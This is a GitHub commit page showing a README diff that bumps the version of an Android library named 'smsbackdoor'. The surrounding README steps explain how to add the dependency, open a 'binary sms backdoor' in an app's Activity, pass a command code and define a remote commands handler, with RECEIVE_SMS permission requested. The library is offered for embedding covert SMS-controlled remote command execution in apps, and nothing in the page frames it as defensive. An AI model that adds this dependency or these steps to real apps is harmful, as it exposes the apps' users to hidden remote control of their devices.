Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
evilthreads669966 authored Oct 6, 2020
1 parent 740a994 commit 04e1cca
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -15,7 +15,7 @@ allprojects {
2. Add the dependency to your app's build.gradle file
```gradle
dependencies {
implementation 'com.github.evilthreads669966:smsbackdoor:alpha-1.0'
implementation 'com.github.evilthreads669966:smsbackdoor:alpha-1.1'
}
```
3. Open the binary sms backdoor inside your Activity and pass in your command code and define your remote commands handler. Make sure to request RECEIVE_SMS permission before opening it.
Expand Down

0 comments on commit 04e1cca

Please sign in to comment.